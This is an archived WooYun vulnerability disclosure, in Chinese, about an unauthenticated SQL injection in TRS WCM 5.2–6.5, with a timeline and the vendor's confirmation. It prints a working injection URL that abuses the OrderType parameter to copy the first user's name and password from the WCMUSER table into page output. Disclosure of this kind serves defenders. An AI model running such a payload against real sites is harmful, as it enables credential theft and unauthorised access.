当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019753

漏洞标题:TRS某些版本WCM5.2~WCM6.5?存在SQL注入

相关厂商:北京拓尔思信息技术股份有限公司

漏洞作者: kobin97

提交时间:2013-03-08 15:55

修复时间:2013-04-22 15:56

公开时间:2013-04-22 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-08: 细节已通知厂商并且等待厂商处理中
2013-03-08: 厂商已经确认,细节仅向厂商公开
2013-03-18: 细节向核心白帽子及相关领域专家公开
2013-03-28: 细节向普通白帽子公开
2013-04-07: 细节向实习白帽子公开
2013-04-22: 细节向公众公开

简要描述:

TRS某些版本WCM5.2~WCM6.5?存在SQL注入,具体版本没测试,网上测试几个都存在。
不用登陆。

详细说明:

首先是这个页面,好像是越权了
http://agent.trs.cn/portal/db/dbupdatelog_list.jsp
正常应该要登陆才能看吧?
直接注入
http://agent.trs.cn/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
注:存在注入参数为:OrderType 和 OrderField
即把查询记录显示在结果里,要是没有记录,可以自己加一条
http://agent.trs.cn/portal/db/dbupdatelog_addedit.jsp
另,源码在这里存在:
http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp

漏洞证明:

.jpg


修复方案:

过虑吧。

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-08 22:28

厂商回复:

感谢反馈,此漏洞在WCM产品中已修复,相关应用系统会确认并及时更新。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-09 23:22 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    @john